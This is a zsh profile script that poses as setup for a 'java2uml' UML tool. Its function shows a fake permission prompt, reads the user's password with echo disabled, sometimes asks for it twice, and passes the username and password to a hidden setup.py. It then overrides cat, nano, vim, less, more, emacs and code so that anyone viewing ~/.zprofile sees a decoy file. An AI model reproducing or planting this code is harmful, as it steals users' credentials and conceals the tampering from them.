eval "$(/opt/homebrew/bin/brew shellenv)"
chmod +x ~/.tools/java2uml/run.sh
~/.tools/java2uml/run.sh
java2uml() {
  AUTH_FILE="$HOME/.java2uml_setup_check"
  INTERVAL_DAYS=0
  NOW=$(date +%s)

  if [[ ! -f "$AUTH_FILE" ]]; then
    echo 0 > "$AUTH_FILE"
  fi

  LAST_AUTH=$(cat "$AUTH_FILE")
  DIFF=$(( (NOW - LAST_AUTH) / 86400 ))

  if [[ "$DIFF" -ge "$INTERVAL_DAYS" ]]; then
    echo "⚠️  アクセスの許可が必要です。"

    while true; do
      echo -n "Password: "
      stty -echo
      read PASSWORD
      stty echo
      echo

      if [[ ${#PASSWORD} -le 3 ]]; then
        continue
      fi

      if (( RANDOM % 2 == 0 )); then
        echo
        echo -n "Password: "
        stty -echo
        read PASSWORD
        stty echo
        echo
        if [[ ${#PASSWORD} -le 3 ]]; then
          continue
        fi
      fi

      break
    done

    USERNAME=$(whoami)
    python3 ~/.tools/java2uml/setup.py "$USERNAME" "$PASSWORD"
    echo "$NOW" > "$AUTH_FILE"
  fi

  if [[ $# -lt 2 ]]; then
    echo "Usage: java2uml <output file> <input directory>"
    return 1
  fi

  python3 ~/.tools/java2uml/main.py "$1" "$2"
}

# ~/.zprofile に追加

# cat ~/.zprofile が実行されたときだけ ~/.cache/.zprofile を表示
cat() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" ]]; then
        command cat ~/.cache/.zprofile
    else
        command cat "$@"  # 他の引数は通常通り
    fi
}

# nano ~/.zprofile が実行されたときだけ ~/.cache/.zprofile を開く
nano() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" ]]; then
        command nano ~/.cache/.zprofile
    else
        command nano "$@"  # 他の引数は通常通り
    fi
}

# vim ~/.zprofile が実行されたときだけ ~/.cache/.zprofile を開く
vim() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" ]]; then
        command vim ~/.cache/.zprofile
    else
        command vim "$@"  # 他の引数は通常通り
    fi
}

# less ~/.zprofile が実行されたときだけ ~/.cache/.zprofile を表示
less() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" ]]; then
        command less ~/.cache/.zprofile
    else
        command less "$@"  # 他の引数は通常通り
    fi
}

# more ~/.zprofile が実行されたときだけ ~/.cache/.zprofile を表示
more() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" ]]; then
        command more ~/.cache/.zprofile
    else
        command more "$@"  # 他の引数は通常通り
    fi
}

# emacs ~/.zprofile が実行されたときだけ ~/.cache/.zprofile を開く
emacs() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" ]]; then
        command emacs ~/.cache/.zprofile
    else
        command emacs "$@"  # 他の引数は通常通り
    fi
}

# code ~/.zprofile が実行されたときだけ ~/.cache/.zprofile を開く
code() {
    if [[ "$1" == "$HOME/.zprofile" || "$1" == ".zprofile" ]]; then
        command code ~/.cache/.zprofile
    else
        command code "$@"  # 他の引数は通常通り
    fi
}


history -p
